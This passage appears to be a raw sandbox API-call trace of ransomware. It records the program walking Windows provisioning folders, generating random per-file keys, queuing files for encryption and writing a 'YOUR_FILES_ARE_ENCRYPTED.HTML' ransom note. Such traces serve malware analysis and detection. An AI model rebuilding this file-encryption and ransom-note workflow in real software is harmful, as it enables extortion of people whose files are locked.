pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned 80 [0106.579] GetProcessHeap () returned 0x600000 [0106.579] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.580] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}" [0106.580] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*" [0106.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626738 [0106.644] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.645] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0f6b62d, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0f6b62d, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0f6b62d, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xe90, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0106.645] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.645] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml") returned 99 [0106.645] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.645] lstrlenW (lpString=".xml") returned 4 [0106.645] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.645] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.645] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0106.646] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=3728) returned 1 [0106.646] GetProcessHeap () returned 0x600000 [0106.646] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0106.649] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="E9") returned 2 [0106.649] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="45") returned 2 [0106.649] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="2A") returned 2 [0106.649] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="BC") returned 2 [0106.649] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="E2") returned 2 [0106.649] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="72") returned 2 [0106.649] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="19") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="A7") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="F5") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="EF") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="A7") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="06") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="7E") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="AB") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="EB") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="88") returned 2 [0106.649] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="37") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="1A") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="66") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="26") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="C6") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="55") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="8F") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="C4") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="B1") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="A0") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="ED") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="15") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="B0") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="FB") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="87") returned 2 [0106.650] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="56") returned 2 [0106.651] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\customizations.xml" [0106.651] CreateIoCompletionPort (FileHandle=0x314, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.651] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0106.651] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eac9f1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0eac9f1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0106.651] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.651] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml") returned 100 [0106.651] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.651] lstrlenW (lpString=".xml") returned 4 [0106.651] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.653] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.653] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0106.653] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0106.653] CloseHandle (hObject=0x32c) returned 1 [0106.653] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0106.653] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.653] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned 85 [0106.654] GetProcessHeap () returned 0x600000 [0106.654] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0106.654] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov" [0106.654] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*" [0106.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626838 [0106.655] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0106.655] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0106.655] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.655] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime") returned 93 [0106.655] GetProcessHeap () returned 0x600000 [0106.655] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0106.657] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime" [0106.657] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*" [0106.657] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0106.657] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0106.657] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e3a2a4, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e3a2a4, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e60513, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0106.657] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.657] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0106.657] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.657] lstrlenW (lpString=".provxml") returned 8 [0106.657] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.657] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e86782, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e86782, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e86782, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0106.657] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.657] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml") returned 109 [0106.657] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.657] lstrlenW (lpString=".provxml") returned 8 [0106.657] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.657] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e86782, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e86782, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e86782, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0 [0106.658] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0106.658] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0106.658] GetProcessHeap () returned 0x600000 [0106.658] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0106.658] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0106.661] WriteFile (in: hFile=0x31c, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0106.662] CloseHandle (hObject=0x31c) returned 1 [0106.663] GetProcessHeap () returned 0x600000 [0106.663] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0106.663] GetProcessHeap () returned 0x600000 [0106.663] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.664] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e60513, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e60513, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x22f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0106.664] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.664] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml") returned 97 [0106.664] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.664] lstrlenW (lpString=".xml") returned 4 [0106.664] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.664] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.665] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=559) returned 1 [0106.665] GetProcessHeap () returned 0x600000 [0106.665] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0106.668] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="0E") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="7A") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="45") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="51") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="C4") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="07") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="F4") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="B9") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="B5") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="3A") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="3F") returned 2 [0106.668] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="75") returned 2 [0106.668] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="62") returned 2 [0106.668] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="F5") returned 2 [0106.668] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="D0") returned 2 [0106.668] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="6C") returned 2 [0106.668] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="94") returned 2 [0106.669] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="16") returned 2 [0106.669] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="1D") returned 2 [0106.669] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="2E") returned 2 [0106.669] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="52") returned 2 [0106.669] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="E8") returned 2 [0106.669] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="5C") returned 2 [0106.669] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="F8") returned 2 [0106.669] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="84") returned 2 [0106.669] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="76") returned 2 [0106.669] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="A2") returned 2 [0106.669] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="B8") returned 2 [0106.669] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="E7") returned 2 [0106.669] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="1B") returned 2 [0106.669] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="C7") returned 2 [0106.669] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="1C") returned 2 [0106.670] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" [0106.670] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.670] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0106.670] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e60513, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e60513, 